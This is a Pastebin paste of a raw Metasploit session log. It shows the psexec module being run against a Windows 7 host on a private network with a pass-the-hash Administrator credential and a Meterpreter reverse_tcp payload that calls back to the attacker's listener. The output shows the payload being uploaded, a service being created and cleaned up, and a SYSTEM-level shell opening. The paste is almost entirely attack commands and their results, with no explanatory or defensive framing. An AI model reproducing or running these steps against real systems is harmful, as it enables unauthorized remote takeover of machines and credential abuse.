Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- meterpreter > background
- msf exploit(ms08_067_netapi) > back
- msf > use exploit/windows/smb/psexec
- msf exploit(psexec) > set RHOST 192.168.1.126
- RHOST => 192.168.1.126
- msf exploit(psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
- PAYLOAD => windows/meterpreter/reverse_tcp
- msf exploit(psexec) > set LHOST 192.168.1.140
- LHOST => 192.168.1.140
- msf exploit(psexec) > set LPORT 80
- LPORT => 80
- msf exploit(psexec) > set SMBUser Administrator
- SMBUser => Administrator
- msf exploit(psexec) > set SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94
- a3fc
- SMBPass => e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc
- msf exploit(psexec) > show options
- Module options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- RHOST 192.168.1.126 yes The target address
- RPORT 445 yes Set the SMB service port
- SMBDomain WORKGROUP no The Windows domain to use for authentication
- SMBPass e669bec4e8f85b6bf1f4ca68da9d1558:67efcdf5bcc5f3b53150e26e2a94a3fc no The password for the specified username
- SMBUser Administrator no The username to authenticate as
- Payload options (windows/meterpreter/reverse_tcp):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- EXITFUNC process yes Exit technique: seh, thread, process
- LHOST 192.168.1.140 yes The listen address
- LPORT 80 yes The listen port
- Exploit target:
- Id Name
- -- ----
- 0 Automatic
- msf exploit(psexec) > exploit -j -z
- [*] Exploit running as background job.
- [*] Started reverse handler on 192.168.1.140:80
- [*] Connecting to the server...
- msf exploit(psexec) > [*] Authenticating as user 'Administrator'...
- [*] Uploading payload...
- [*] Created \CVoJSded.exe...
- [*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
- [*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.126[\svcctl] ...
- [*] Obtaining a service manager handle...
- [*] Creating a new service (PkyMibtg - "MhHUOHCe")...
- [*] Closing service handle...
- [*] Opening service...
- [*] Starting the service...
- [*] Removing the service...
- [*] Closing service handle...
- [*] Deleting \CVoJSded.exe...
- [*] Sending stage (748544 bytes) to 192.168.1.126
- [*] Meterpreter session 2 opened (192.168.1.140:80 -> 192.168.1.126:49356) at Sat Sep 18 11:09:55 +0200 2010
- sessions -i 2
- [*] Starting interaction with 2...
- meterpreter > sysinfo
- Computer: P0002
- OS : Windows 7 (Build 7600, ).
- Arch : x86
- Language: en_US
- meterpreter > getuid
- Server username: NT AUTHORITY\SYSTEM
- meterpreter >
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement